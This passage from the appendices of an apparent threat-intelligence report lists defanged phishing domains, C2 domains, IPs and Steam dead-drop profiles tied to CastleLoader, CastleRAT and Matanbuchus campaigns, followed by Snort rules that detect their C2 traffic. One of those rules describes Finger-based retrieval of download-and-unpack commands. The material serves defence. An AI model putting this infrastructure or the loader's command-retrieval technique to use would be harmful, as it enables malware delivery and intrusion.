            <div>confirmhotelistay[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-01</div>
            <div>2025-10-16</div>
          </div>
          <div>
            <div>confirmhotelystay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>confirmstayon[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-29</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>confirmstayonline[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-29</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>confirmyhotelstay[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaformahub[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaformhub[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaformsafe[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaportalverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaverifyportal[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guestformahub[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-30</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>guestformasafe[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-30</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guestformhub[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guestformsafe[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-28</div>
            <div>2025-11-03</div>
          </div>
          <div>
            <div>185[.]39[.]19[.]180</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>guestistayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-02</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guestportalverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>gueststayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestverifyhub[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestverifylink[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-28</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>guestverifyportal[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestystayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guesutastayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guesytastayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>hoteliguestverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelistayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelyguestverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-31</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>hotelystayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-31</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>nedpihotel[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-29</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>pilolhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-29</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>roomiverifaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>roomverifaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-03</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>roomverifiaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>servicehotelonline[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-03</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>verifihubguest[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>verifyhubguest[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
            <div><strong>Notes</strong></div>
          </div>
          <div>
            <div>dok-ol[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-27</div>
            <div>2025-07-28</div>
            <div>N/A</div>
          </div>
          <div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-11-10</div>
          </div>
          <div>
            <div>cik-ed[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-11-09</div>
            <div>N/A</div>
          </div>
          <div>
            <div>for-es[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-25</div>
            <div>2025-11-03</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>kil-it[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-06-29</div>
            <div>2025-11-07</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>kip-er[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-11</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>xut-uv[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-20</div>
            <div>2025-11-08</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>eta-cd[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-22</div>
            <div>2025-11-08</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>uki-fa[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-22</div>
            <div>2025-11-07</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>ned-uj[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-10</div>
            <div>2025-11-05</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>eto-sa[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-06-25</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>wal-ik[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-10</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>mac-ig[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-20</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>map-nv[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-11</div>
            <div>2025-11-06</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>ipk-sa[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-18</div>
            <div>2025-11-06</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>her-op[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-06-24</div>
            <div>2025-06-24</div>
            <div>Domain used in “Completed processing task” log, per the DOM</div>
          </div>
          <div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-06-25</div>
            <div>2025-06-25</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains</h2>
        <div>
          <div>
            <div><strong>Steam Community Profile Link</strong></div>
            <div><strong>C2 Domain</strong></div>
            <div><strong>IP Address</strong></div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/tfy5d6gohu8tgy687r7</div>
            <div>
              <p>tdbfvgwe456yt[.]com</p>
              <p>miteamss[.]com</p>
            </div>
            <div>45[.]134[.]26[.]41<br />91[.]202[.]233[.]132<br />91[.]202[.]233[.]250</div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/desdsfds34324y3g</div>
            <div>
              <p>gabesworld[.]com</p>
              <p>autryjones[.]com</p>
            </div>
            <div>
              <p>194[.]76[.]227[.]242</p>
              <p>46[.]28[.]67[.]22<br />195[.]211[.]97[.]51</p>
            </div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/fio34h8dsh3iufs</div>
            <div>treetankists[.]com</div>
            <div>45[.]11[.]181[.]59</div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/jeg238r7staf378s</div>
            <div>kakapupuneww[.]com</div>
            <div>45[.]135[.]232[.]149</div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/krouvhsin34287f7h3</div>
            <div>justnewdmain[.]com<br /><br />programsbookss[.]com</div>
            <div>
              <p>192[.]109[.]138[.]102</p>
              <p>185[.]208[.]158[.]250</p>
              <p>178[.]17[.]57[.]102</p>
              <p>64[.]52[.]80[.]121</p>
              <p>45[.]32[.]69[.]11</p>
              <p>67[.]217[.]228[.]198</p>
              <p>192[.]153[.]57[.]125</p>
            </div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>bioskbd[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-23</div>
            <div>2025-09-29</div>
          </div>
          <div>
            <div>blkiesf[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-25</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>boikfrs[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-22</div>
            <div>2025-09-29</div>
          </div>
          <div>
            <div>boiksal[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-04</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>bookingnewprice109034[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>bookingnewprice204167[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guest-request16433[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-request44565494[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-05</div>
            <div>2025-09-07</div>
          </div>
          <div>
            <div>guest-request64533[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-request666543[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guest-request677653[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-update666532345[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelroomprice1039375[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>info-guest44567645[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-28</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>info676345677[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>newmessage10294[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-09</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>request-info3444[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-21</div>
          </div>
          <div>
            <div>request-info4433345[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>request345553[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-22</div>
          </div>
          <div>
            <div>request44456776[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>update-gues3429[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-21</div>
          </div>
          <div>
            <div>update-guest4398317809[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-14</div>
            <div>2025-09-17</div>
          </div>
          <div>
            <div>update-info14546[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info3458421[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-25</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info4467[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info4468765[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-25</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>update-info539156[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-24</div>
            <div>2025-09-02</div>
          </div>
          <div>
            <div>update-info71556[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-28</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>update-reques898665[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-21</div>
            <div>2025-09-02</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix H: Indicators of Compromise (IoCs)</h2>
        <div>
          <div>
            <div>
              <pre><code>CastleRAT C2 IP Addresses:
5[.]35[.]44[.]176
34[.]72[.]90[.]40
45[.]11[.]180[.]174
45[.]11[.]180[.]198
45[.]11[.]181[.]59
45[.]32[.]69[.]11
45[.]61[.]136[.]81
45[.]134[.]26[.]41
45[.]135[.]232[.]149
45[.]144[.]53[.]62
46[.]28[.]67[.]22
64[.]52[.]80[.]121
66[.]63[.]187[.]224
67[.]217[.]228[.]198
77[.]90[.]153[.]43
77[.]238[.]241[.]203
79[.]132[.]130[.]148
79[.]132[.]131[.]200
85[.]192[.]49[.]6
85[.]208[.]84[.]115
87[.]120[.]93[.]167
91[.]202[.]233[.]132
91[.]202[.]233[.]250
94[.]141[.]122[.]164
102[.]135[.]95[.]102
104[.]225[.]129[.]171
144[.]208[.]126[.]50
168[.]100[.]8[.]84
178[.]17[.]57[.]102
178[.]17[.]57[.]153
185[.]125[.]50[.]125
185[.]149[.]146[.]118
185[.]156[.]248[.]24
185[.]196[.]9[.]80
185[.]196[.]9[.]222
185[.]196[.]10[.]8
185[.]196[.]11[.]171
185[.]208[.]158[.]250
192[.]109[.]138[.]102
192[.]153[.]57[.]125
194[.]76[.]227[.]242
195[.]85[.]115[.]44
195[.]149[.]146[.]118
195[.]201[.]108[.]189
195[.]211[.]97[.]51

CastleRAT C2 Domains:
autryjones[.]com
gabesworld[.]com
justnewdmain[.]com
kakapupuneww[.]com
miteamss[.]com
programsbookss[.]com
tdbfvgwe456yt[.]com
treetankists[.]com

Steam Community URLs:
hxxps[://]steamcommunity[.]com/id/desdsfds34324y3g
hxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs
hxxps[://]steamcommunity[.]com/id/jeg238r7staf378s
hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3
hxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7

CastleLoader C2 IP Addresses:
31[.]58[.]50[.]160
31[.]58[.]87[.]132
45[.]11[.]183[.]19
45[.]11[.]183[.]45
45[.]11[.]183[.]165
45[.]155[.]249[.]121
80[.]77[.]25[.]88
80[.]77[.]25[.]114
80[.]77[.]25[.]239
107[.]158[.]128[.]26
147[.]45[.]177[.]127
170[.]130[.]165[.]201
172[.]86[.]90[.]58
173[.]44[.]141[.]52
185[.]121[.]234[.]141

CastleLoader C2 Domains:
alafair[.]net
anotherproject[.]icu
bethschwier[.]com
campanyasoft[.]com
castlppwnd[.]com
donttouchme[.]life
donttouchthisisuseless[.]icu
doyoureallyseeme[.]icu
dpeformse[.]com
icantseeyou[.]icu
oldspicenotsogood[.]shop
rcpeformse[.]com
roject0[.]com
speatly[.]com
touchmeplease[.]icu
wereatwar[.]com

Additional Domains:
albafood[.]shop
albalk[.]lol
bdeskthebest[.]shop
bestproxysale[.]shop
bestvpninfo[.]shop
chessinthenight[.]lol
clgenetics[.]shop
docusign[.]homes
dubaialbafood[.]shop
easyadvicesforyou[.]shop
easyprintscreen[.]shop
funjobcollins[.]shop
nort-secure[.]shop
norton-secure[.]shop
notstablecoin[.]xyz
notusdt[.]lol
nvidblog[.]shop
nvldlainfoblog[.]shop
oldspicenotsogood[.]shop
starkforeveryone[.]lol
sweetdevices[.]lol
testdomain123123[.]shop
tradeviewdesktop[.]shop
tradlngview-desktop[.]biz
tradlngvlewdesktop[.]shop
tradview-desktop[.]shop
vipcinemade[.]shop
vipcinemadubai[.]shop
vipdubaicinema[.]shop

Cluster 1 (TAG-160) Logistics-Themed Domains:
cdlfreightlogistics[.]com
dperforms[.]info
englandloglstics[.]com
englanglogistlcs[.]com
hometownlogisticsllc[.]com
leemanlogisticsinc[.]com
loadplannig[.]com
loads[.]icu
loadsplanning[.]com
loadsschedule[.]com
loadstracking[.]com
loadstrucking[.]com
mcentireinc[.]com
mcloads[.]com
mlxfreightinc[.]com
mrlogsol[.]ca
pinaccletruckllc[.]com
rateconfirmations[.]com
redlightninglogistics[.]com
redlightninglogisticsinc[.]com
starshiplogisticsgroupllc[.]com
tenderloads[.]com
trucksscheduling[.]com

Cluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:
74[.]119[.]239[.]234
78[.]153[.]155[.]131
162[.]215[.]230[.]96
162[.]215[.]230[.]150
162[.]215[.]241[.]46
162[.]215[.]241[.]215
162[.]251[.]80[.]108
185[.]236[.]20[.]154
192[.]124[.]178[.]74
199[.]79[.]62[.]141
204[.]11[.]58[.]80
207[.]174[.]212[.]141

Matanbuchus C2 IP Addresses:
185[.]39[.]19[.]164

Matanbuchus C2 Domains:
galaxioflow[.]com
mechiraz[.]com
nicewk[.]com
nimbusvaults[.]com

Cluster 2 (TAG-161) Booking.com-Themed Domains:
checkinastayverify[.]com
checkinistayverify[.]com
checkinstayverify[.]com
checkistayverify[.]com
checksstayverify[.]com
checkystayverify[.]com
confirmahotelastay[.]com
confirmahotelstay[.]com
confirmhotelestay[.]com
confirmhotelistay[.]com
confirmhotelystay[.]com
confirmstayon[.]com
confirmstayonline[.]com
confirmyhotelstay[.]com
guestaformahub[.]com
guestaformhub[.]com
guestaformsafe[.]com
guestaportalverify[.]com
guestaverifyportal[.]com
guestformahub[.]com
guestformasafe[.]com
guestformhub[.]com
guestformsafe[.]com
guestistayhotel[.]com
guestportalverify[.]com
gueststayhotel[.]com
guestverifyhub[.]com
guestverifylink[.]com
guestverifyportal[.]com
guestystayhotel[.]com
guesutastayhotel[.]com
guesytastayhotel[.]com
hoteliguestverify[.]com
hotelistayverify[.]com
hotelyguestverify[.]com
hotelystayverify[.]com
nedpihotel[.]com
pilolhotel[.]com
roomiverifaccess[.]com
roomverifaccess[.]com
roomverifiaccess[.]com
servicehotelonline[.]com
verifihubguest[.]com
verifyhubguest[.]com

Cluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:
77[.]83[.]207[.]55
185[.]39[.]19[.]180
185[.]39[.]19[.]181

Other Domains Linked to Cluster 2 (TAG-161):
cik-ed[.]com
cut-gv[.]com
dip-bo[.]com
dok-ol[.]com
dut-cd[.]com
eta-cd[.]com
eto-sa[.]com
fir-vp[.]com
for-es[.]com
gir-vc[.]com
gut-bk[.]com
her-op[.]com
ipk-sa[.]com
itp-ce[.]com
kil-it[.]com
kip-er[.]com
mac-ig[.]com
map-nv[.]com
ned-uj[.]com
otr-gl[.]com
pit-kp[.]com
rol-vd[.]com
site-bila[.]com
site-here[.]com
site-reto[.]com
site-tilo[.]com
site-wila[.]com
spu-cr[.]com
tam-cg[.]com
uke-sd[.]com
uki-fa[.]com
wal-ik[.]com
xut-uv[.]com
xyt-ko[.]com
ykl-vh[.]com
yt-ko[.]com
zit-fl[.]com

Proxy IP Addresses Linked to Cluster 2 (TAG-161):
109[.]104[.]153[.]29
109[.]104[.]153[.]100
109[.]104[.]153[.]193
109[.]104[.]154[.]67

Additional IP Addresses Linked to Phishing Email Management Tooling:
80[.]64[.]18[.]245
85[.]208[.]84[.]65
88[.]214[.]50[.]83
185[.]39[.]19[.]94

Cluster 3 Booking.com-Themed Domains:
bioskbd[.]com
blkiesf[.]com
boikfrs[.]com
boiksal[.]com
bookingnewprice109034[.]icu
bookingnewprice204167[.]icu
guest-request16433[.]com
guest-request44565494[.]com
guest-request64533[.]com
guest-request666543[.]com
guest-request677653[.]com
guest-update666532345[.]com
hotelroomprice1039375[.]icu
info-guest44567645[.]com
info676345677[.]com
justnewdmain[.]com
newmessage10294[.]com
programsbookss[.]com
request-info3444[.]com
request-info4433345[.]com
request345553[.]com
request44456776[.]com
update-gues3429[.]com
update-guest4398317809[.]com
update-info14546[.]com
update-info3458421[.]com
update-info4467[.]com
update-info4468765[.]com
update-info539156[.]com
update-info71556[.]com
update-reques898665[.]com

Cluster 3 IP Addresses Hosting Booking.com-Themed Domains:
178[.]17[.]57[.]103
192[.]109[.]138[.]102
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix I: Snort Rules for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -&gt; $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix J: Snort Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

